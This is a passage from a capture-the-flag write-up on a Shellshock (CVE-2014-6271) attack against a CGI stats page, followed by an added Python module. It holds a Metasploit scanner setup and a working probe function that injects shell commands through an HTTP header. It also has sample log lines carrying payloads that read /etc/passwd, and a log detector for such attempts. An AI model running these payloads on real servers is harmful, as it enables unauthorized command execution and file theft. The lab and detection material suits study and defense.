```html
<html>
<head>
<style>
body, pre { color: #7b7b7b; font: 300 16px/25px "Roboto", Helvetica, Arial, sans-serif; }
</style>
<meta name="generator" content="vi2html">
</head>
<body>
</br>
Welcome to control plane application of Aeroctf system.</br>
</br>
</br>
On a dashboard you can see loading our system</br>
</br>
Stats: </br>
<iframe frameborder=0 width=800 height=600 src="/cgi-bin/stats"></iframe>
</body>
</html>
```
The page embeds `/cgi-bin/stats`, so the backend is a CGI script, and the response headers show an Apache httpd server:
```
curl -v 'http://81.23.11.159:8080/cgi-bin/stats'
*   Trying 81.23.11.159...
* TCP_NODELAY set
* Connected to 81.23.11.159 (81.23.11.159) port 8080 (#0)
> GET /cgi-bin/stats HTTP/1.1
> Host: 81.23.11.159:8080
> User-Agent: curl/7.64.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Fri, 08 Mar 2019 19:32:50 GMT
< Server: Apache/2.2.22 (Debian)
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html
<
Fri Mar  8 19:32:50 UTC 2019
 19:32:50 up 93 days,  5:01,  0 users,  load average: 0.05, 0.02, 0.00
* Connection #0 to host 81.23.11.159 left intact
```
The body is just what `date` and `uptime` print, so the CGI program is very likely a shell script. Apache hands request headers to CGI programs as environment variables, and if that shell is an unpatched bash, a header value starting with `() { :;};` is parsed as a function definition and whatever follows the closing brace gets executed: Shellshock (CVE-2014-6271). So let's fire up Metasploit, because we may have a Shellshock vulnerability here.
First, the auxiliary scanner `apache_mod_cgi_bash_env` checks whether the target is actually vulnerable:
```
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CMD        /usr/bin/id      yes       Command to run (absolute paths required)
   CVE        CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER     User-Agent       yes       HTTP header to use
   METHOD     GET              yes       HTTP method to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                   yes       Path to CGI script
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RHOSTS 81.23.11.159
RHOSTS => 81.23.11.159
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RPORT 8080
RPORT => 8080
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/stats
TARGETURI => /cgi-bin/stats
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > run
```
```
/bin/cat << EOM
</pre>
EOM
test
Content-type: text/html

Fri Mar 8 20:27:27 UTC 2019
```
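What the scanner does under the hood, as an added example (my code, not the writeup's and not Metasploit's): the header value is a bash function definition followed by a command; the two leading `echo`s close the CGI header block so the command output lands in the body instead of being rejected as a malformed header; and a random marker brackets the output so that a page which merely reflects the User-Agent is not mistaken for code execution, a pitfall with a bare `/usr/bin/id` payload. Because bash runs the injected command while importing the environment, before the script itself starts, the script's own `Content-type: text/html` line ends up inside the body after the injected output. The host, port and CGI path are the writeup's; the response bodies and access-log lines are constructed samples, not captured traffic. The last function is the defender's side of the same bug: flagging Shellshock attempts in an Apache combined log.

```python
"""Shellshock (CVE-2014-6271) probe and log-detection helpers.

Added example for this writeup; not code from the original post or from
Metasploit. The target host, port and CGI path are the writeup's. Every
response body and log line below is a constructed sample.
"""
import http.client
import re
import secrets
from typing import Iterable, List, Optional

# Unpatched bash imported a function definition from any environment
# variable whose value began with "() {" and kept executing whatever
# followed the closing brace. mod_cgi exports request headers as HTTP_*
# environment variables, so a header reaches bash when the CGI is a
# bash script.
PREFIX = "() { :;}; "
_FUNC_PREFIX_RE = re.compile(r"\(\)\s*\{")


def build_payload(command: str, marker: str) -> str:
    """Header value that runs `command` on a vulnerable bash CGI.

    The two leading `echo`s end the CGI header block so the command output
    lands in the response body. `marker` is echoed before and after the
    output so execution can be told apart from a reflected header.
    """
    return f"{PREFIX}echo; echo; echo {marker}; {command}; echo {marker}"


def extract_output(body: str, marker: str) -> Optional[str]:
    """Text between the two markers, or None when the command did not run.

    A body that still contains the "() {" prefix reflected our header
    rather than executing it; the markers then sit inside the echoed
    payload, which a naive substring check would count as a hit.
    """
    if _FUNC_PREFIX_RE.search(body):
        return None
    m = re.search(re.escape(marker) + r"(.*?)" + re.escape(marker), body, re.S)
    return m.group(1).strip() if m else None


def probe(host: str, port: int, path: str, command: str = "/usr/bin/id",
          header: str = "User-Agent", timeout: float = 5.0) -> Optional[str]:
    """One probe request, the same GET-with-CMD-in-HEADER the Metasploit
    scanner sends. Returns the command output, or None if not vulnerable.
    Needs network access; the offline samples below exercise the parser."""
    marker = secrets.token_hex(8)
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={header: build_payload(command, marker)})
        body = conn.getresponse().read().decode("utf-8", "replace")
    finally:
        conn.close()
    return extract_output(body, marker)


def find_shellshock_attempts(log_lines: Iterable[str]) -> List[str]:
    """Defender side: Apache combined-log lines whose request line, referer
    or user-agent carries a bash function prefix."""
    hits = []
    for line in log_lines:
        # All three quoted fields become environment variables for the
        # CGI, so any of them can be the injection vector.
        quoted = re.findall(r'"((?:[^"\\]|\\.)*)"', line)
        if any(_FUNC_PREFIX_RE.search(field) for field in quoted):
            hits.append(line)
    return hits


# Constructed samples (not captured from the target).
MARKER = "m4rk3r"
# Vulnerable: bash runs the injected command while importing the
# environment, before the script starts, so the script's own
# "Content-type:" header line shows up inside the body afterwards.
VULNERABLE_BODY = (
    f"{MARKER}\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n{MARKER}\n"
    "Content-type: text/html\n\n<pre>\nFri Mar  8 20:27:27 UTC 2019\n</pre>\n"
)
# Not vulnerable, but the page echoes the User-Agent back verbatim.
REFLECTED_BODY = (
    "<pre>Your browser: () { :;}; echo; echo; echo m4rk3r; "
    "/usr/bin/id; echo m4rk3r</pre>\n"
)
# Patched bash: the header is ignored and the normal stats come back.
PATCHED_BODY = "<pre>\nFri Mar  8 20:27:27 UTC 2019\n 20:27:27 up 93 days\n</pre>\n"
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Mar/2019:19:32:50 +0000] "GET /cgi-bin/stats HTTP/1.1" '
    '200 112 "-" "curl/7.64.0"',
    '198.51.100.7 - - [08/Mar/2019:20:27:27 +0000] "GET /cgi-bin/stats HTTP/1.1" '
    '200 173 "-" "() { :;}; echo; echo; /usr/bin/id"',
    '203.0.113.5 - - [08/Mar/2019:20:28:01 +0000] "GET /cgi-bin/stats HTTP/1.1" '
    '200 640 "() { :;}; /bin/cat /etc/passwd" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("vulnerable:", extract_output(VULNERABLE_BODY, MARKER))
    print("reflected :", extract_output(REFLECTED_BODY, MARKER))
    print("patched   :", extract_output(PATCHED_BODY, MARKER))
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print("attempt   :", hit)
```

Against the live target you would call `probe("81.23.11.159", 8080, "/cgi-bin/stats")`; anything other than `None` is command output and confirms execution. The reflection check matters on pages that print the visitor's browser string, where the marker appears twice in the body without the command ever having run.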
I looked around for a few minutes for where the flag could be, then decided to take a look at /etc/passwd: maybe an unusual user would point me to a vulnerable service or something.